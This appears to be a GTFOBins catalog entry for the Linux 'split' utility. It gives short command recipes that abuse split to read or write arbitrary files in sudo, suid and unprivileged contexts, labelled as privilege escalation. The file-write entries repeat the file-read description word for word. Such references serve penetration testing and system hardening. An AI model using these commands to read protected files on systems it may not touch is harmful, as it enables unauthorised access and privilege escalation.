Catalog GTFOBins

GTFO · Tool

split

9 techniques LinuxGTFOBins GPL-3.0

file-read

File ReadPrivilege Escalation Linux

This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.

split -b 999 --additional-suffix suffix /path/to/input-file prefix
cat prefixaasuffix
Context
sudo
Native
file-read
MITRE
T1005

file-read

File ReadPrivilege Escalation Linux

This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.

split -b 999 --additional-suffix suffix /path/to/input-file prefix
cat prefixaasuffix
Context
suid
Native
file-read
MITRE
T1005

file-read

File Read Linux

This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.

split -b 999 --additional-suffix suffix /path/to/input-file prefix
cat prefixaasuffix
Context
unprivileged
Native
file-read
MITRE
T1005

file-write

File WritePrivilege Escalation Linux

This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.

split -b 999 --additional-suffix suffix /path/to/input-file prefix
Context
sudo
Native
file-write
MITRE
T1565

file-write

File WritePrivilege Escalation Linux

This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.

split -b 999 --additional-suffix suffix /path/to/input-file prefix
Context
suid
Native
file-write
MITRE
T1565

file-write

File Write Linux

This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.

split -b 999 --additional-suffix suffix /path/to/input-file prefix
Context
unprivileged
Native
file-write
MITRE
T1565